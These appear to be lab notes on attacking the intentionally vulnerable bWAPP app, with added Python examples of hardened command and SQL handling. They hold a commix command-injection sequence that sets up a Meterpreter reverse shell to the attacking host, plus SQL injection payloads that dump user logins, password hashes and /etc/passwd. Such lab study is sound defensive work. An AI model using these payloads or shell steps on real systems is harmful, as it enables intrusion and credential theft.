A1 - Injection

OS Command Injection - Blind

Powershell Injection Attacks using Commix and Magic Unicorn

  • Enter the Kali IP (10.0.2.132); the Windows target (10.0.2.130) will send an ICMP echo request to this host.

    POST /bWAPP/commandi_blind.php HTTP/1.1
    Host: 10.0.2.130
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://10.0.2.130/bWAPP/commandi_blind.php
    Cookie: PHPSESSID=5cct1ln3aqlv7volp52rhnvil5; security_level=0
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 29
    
    target=10.0.2.132&form=submit
    
  • Checking the packets in Wireshark, the target did send an ICMP request and this host answered with an ICMP reply.

  • Run the command injection with commix: commix --url="http://10.0.2.130/bWAPP/commandi_blind.php" --data="target=10.0.2.132&form=submit" --cookie="PHPSESSID=5cct1ln3aqlv7volp52rhnvil5; security_level=0"

  • Then run the following in sequence:

    commix(os_shell) > reverse_tcp
    
    commix(reverse_tcp) > set LHOST 10.0.2.132
    LHOST => 10.0.2.132
    
    commix(reverse_tcp) > set LPORT 4444
    LPORT => 4444
    
      ---[ Reverse TCP shells ]---     
      Type '1' to use a netcat reverse TCP shell.
      Type '2' for other reverse TCP shells.
    
    commix(reverse_tcp) > 2
    
      ---[ Unix-like reverse TCP shells ]---
      Type '1' to use a PHP reverse TCP shell.
      Type '2' to use a Perl reverse TCP shell.
      Type '3' to use a Ruby reverse TCP shell. 
      Type '4' to use a Python reverse TCP shell.
    
      ---[ Meterpreter reverse TCP shells ]---
      Type '5' to use a PHP meterpreter reverse TCP shell.
      Type '6' to use a Python meterpreter reverse TCP shell. 
      Type '7' to use a Windows meterpreter reverse TCP shell. 
      Type '8' to use the web delivery script. 
    
    commix(reverse_tcp_other) > 7
    
      ---[ Powershell injection attacks ]---
      Type '1' to use shellcode injection with native x86 shellcode.
      Type '2' to use TrustedSec's Magic Unicorn.
    
    commix(windows_meterpreter_reverse_tcp) > 2
    
    [*] Generating the 'windows/meterpreter/reverse_tcp' shellcode... [ SUCCEED ]
    [*] Type "msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc" (in a new window).
    [*] Once the loading is done, press here any key to continue...
    [+] Everything is in place, cross your fingers and wait for a shell!
    
    • At this point unicorn.rc is generated:
      root@kali:/usr/share/commix/src/thirdparty/unicorn# cat unicorn.rc 
      use exploit/multi/handler
      set payload windows/meterpreter/reverse_tcp
      set lhost 10.0.2.132
      set lport 4444
      exploit
      
  • Before pressing Enter, open a new terminal and run unicorn.rc: type msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc, or inside msfconsole type resource /usr/share/commix/src/thirdparty/unicorn/unicorn.rc

  • After pressing Enter it fails. Does it need a Windows 10 environment??? What weakness does this count as exploiting? PowerShell???

    [x] Critical: The reverse TCP connection has failed!
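
As an added example (not code from the page or from bWAPP), the handler pattern behind commandi_blind.php, a ping whose target comes straight from the form field, written in Python beside a hardened version that accepts the value only if it parses as an IP address and runs ping as an argv list with no shell. Function names and the injected sample value are assumptions.

```python
import ipaddress
import shlex
import subprocess


def ping_cmdline_vulnerable(target):
    # Same pattern as the bWAPP page: the form value is pasted into a shell
    # string, so metacharacters in 'target' are parsed by /bin/sh as more commands.
    return "ping -c 1 " + target


def shell_tokens(cmdline):
    # Tokenise the way a POSIX shell would (';', '|', '&' become operators),
    # to show what the concatenated string turns into before it is executed.
    return list(shlex.shlex(cmdline, punctuation_chars=True))


def ping_argv_hardened(target):
    # Allow-list: the value must parse as an IPv4/IPv6 address, otherwise
    # ipaddress raises ValueError and nothing is executed.
    addr = ipaddress.ip_address(target.strip())
    # An argv list goes to the OS directly; no shell ever sees the value.
    return ["ping", "-c", "1", str(addr)]


def ping_hardened(target, timeout=5):
    # Runs the validated command without a shell and reports reachability.
    result = subprocess.run(ping_argv_hardened(target),
                            capture_output=True, timeout=timeout)
    return result.returncode == 0


if __name__ == "__main__":
    # Constructed input: the page's legitimate target, then an injected command.
    for value in ("10.0.2.132", "10.0.2.132; id"):
        print("vulnerable ->", shell_tokens(ping_cmdline_vulnerable(value)))
        try:
            print("hardened   ->", ping_argv_hardened(value))
        except ValueError as err:
            print("hardened   -> rejected:", err)
```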
    

SQL Injection (GET/Search)

Low Level

  • Entering a single quote (') produces the error message Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
  • Entering ' ORDER BY 3 -- - sorts the result by the third column; the result did not appear sorted, but no error occurred either, which means a third column exists.
  • Testing in sequence up to ' ORDER BY 8 -- - gives Error: Unknown column '8' in 'order clause', which shows there are only seven columns.
  • Query the database name: http://10.0.2.142/bWAPP/sqli_1.php?title=' AND 1=0 UNION ALL SELECT 1,2,database(),4,5,6,7 -- - returns bWAPP
    • Here AND 1=0 means we only want the rows from the UNION that follows; the original query's rows are discarded.
  • Query the table names: http://10.0.2.142/bWAPP/sqli_1.php?title=' AND 1=0 UNION ALL SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' -- - returns users
  • Query the columns: http://10.0.2.142/bWAPP/sqli_1.php?title=' AND 1=0 UNION ALL SELECT 1,table_name, column_name,4,5,6,7 FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_schema='bWAPP' AND table_name='users' -- - returns columns such as id, login and password.
  • Query all the users' information: http://10.0.2.142/bWAPP/sqli_1.php?title=' AND 1=0 UNION ALL SELECT 1,login,password,secret,email,admin,7 FROM users-- - returns
    A.I.M.     6885858486f31043e5839c735d99457f045affd0     [email protected]     A.I.M. or Authentication Is Missing     Link
    bee     6885858486f31043e5839c735d99457f045affd0     [email protected]     Any bugs?     Link
    

SQL Injection (GET/Select)

Low Level

  • http://10.0.2.142/bWAPP/sqli_2.php?movie=2 and 1=0 UNION all SELECT 1,login,password,secret,email,admin,7 FROM users-- -&action=go
  • Since the select here only displays one row of the returned data, use LIMIT to choose which row is read: http://10.0.2.142/bWAPP/sqli_2.php?movie=2 and 1=0 UNION all SELECT 1,login,password,secret,email,admin,7 FROM users LIMIT 1,2-- -&action=go
  • Or select the row by id: http://10.0.2.142/bWAPP/sqli_2.php?movie=2 and 1=0 UNION all SELECT 1,login,password,secret,email,admin,7 FROM users WHERE id=2-- -&action=go

SQL Injection (POST/Search)

Low Level

  • title=' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;-- &action=search

SQL Injection (POST/Select)

Low Level

  • movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--

SQL Injection (Login Form/Hero)

Low Level

  • ' or 1=1-- (with a trailing space)

SQL Injection (Login Form/User)

Low Level

  • ...

SQL Injection (AJAX/JSON/jQuery)

Low Level

  • Use the live search field. From the source code it uses a LIKE fuzzy query; as a simple test, search for movies whose titles contain iron or term. (Note: LIKE is a "fuzzy search" used together with wildcards such as the percent sign (%) or underscore (_): % matches zero or more arbitrary characters, and _ matches exactly one character.)
    • http://10.0.2.142/bWAPP/sqli_10-2.php?title=iron%'+or+title+like+'%term
      [{"0":"2","id":"2",
      "1":"Iron Man","title":"Iron Man",
      "2":"2008","release_year":"2008",
      "3":"action","genre":"action",
      "4":"Tony Stark","main_character":"Tony Stark",
      "5":"tt0371746","imdb":"tt0371746",
      "6":"53","tickets_stock":"53"},
      {"0":"4","id":"4",
      "1":"Terminator Salvation","title":"Terminator Salvation",
      "2":"2009","release_year":"2009",
      "3":"sci-fi","genre":"sci-fi",
      "4":"John Connor","main_character":"John Connor",
      "5":"tt0438488","imdb":"tt0438488",
      "6":"100","tickets_stock":"100"}]
      
  • The result shows there are 7 columns; try querying the version:
    • http://10.0.2.142/bWAPP/sqli_10-2.php?title=iron%'+union+select+1,version(),3,4,5,6,7+and'%'='
    • Returns 5.0.96-0ubuntu3
  • Query the table names:
    • http://10.0.2.142/bWAPP/sqli_10-2.php?title=iron%'+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--+and'%'='
    • Returns blog,heroes,movies,users,visitors
  • Query the column names:
    • http://10.0.2.142/bWAPP/sqli_10-2.php?title=iron%'+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name='users'--+and'%'='
    • Returns id,login,password,email,secret,activation_code,activated,reset_code,admin,uid,name,pass,mail,theme,signature,signature_format,created,access,login,status,timezone,language,picture,init,data
  • Read /etc/passwd:
    • http://10.0.2.142/bWAPP/sqli_10-2.php?title=iron%'+union+select+1,group_concat(login,0x3a,password),load_file('/etc/passwd'),4,5,6,7+from+users--+and'%'='
      {"0":"1","id":"1",
       "1":"A.I.M.:6885858486f31043e5839c735d99457f045affd0,bee:6885858486f31043e5839c735d99457f045affd0","title":"A.I.M.:6885858486f31043e5839c735d99457f045affd0,bee:6885858486f31043e5839c735d99457f045affd0",
       "2":"root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/bin\/sh\nbin:x:2:2
       ...
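
As an added example covering the SQL injection pages above (it is not code from the page or from bWAPP, which is PHP/MySQL), a Python/sqlite3 stand-in for the sqli_10-2.php LIKE search: the string-concatenated query that the iron%' or title like '%term payload breaks out of, beside a parameterised version that also escapes the LIKE wildcards. The movies rows and function names are constructed for the example.

```python
import sqlite3

# Constructed sample rows standing in for bWAPP's movies table (not its real schema).
MOVIES = [
    (1, "The Incredible Hulk", 2008),
    (2, "Iron Man", 2008),
    (3, "The Dark Knight", 2008),
    (4, "Terminator Salvation", 2009),
]

# The payload from the sqli_10-2.php request above.
PAYLOAD = "iron%' or title like '%term"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (id INTEGER, title TEXT, release_year INTEGER)")
    conn.executemany("INSERT INTO movies VALUES (?, ?, ?)", MOVIES)
    return conn


def search_vulnerable(conn, term):
    # String concatenation: the quote inside 'term' closes the literal and the
    # rest of the input is executed as SQL, so the OR clause returns extra rows.
    sql = "SELECT title FROM movies WHERE title LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def escape_like(term):
    # Escape the LIKE metacharacters so user input is matched literally.
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_hardened(conn, term):
    # Bound parameter: the whole term is a single string value, never SQL.
    pattern = "%" + escape_like(term) + "%"
    sql = "SELECT title FROM movies WHERE title LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, (pattern,))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload :", search_vulnerable(db, PAYLOAD))
    print("hardened, payload   :", search_hardened(db, PAYLOAD))
    print("hardened, 'iron'    :", search_hardened(db, "iron"))
```

Binding the parameter alone stops the injection, but a bound % or _ still acts as a wildcard, so a bare % would list every row; escape_like with the ESCAPE clause closes that gap.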
      
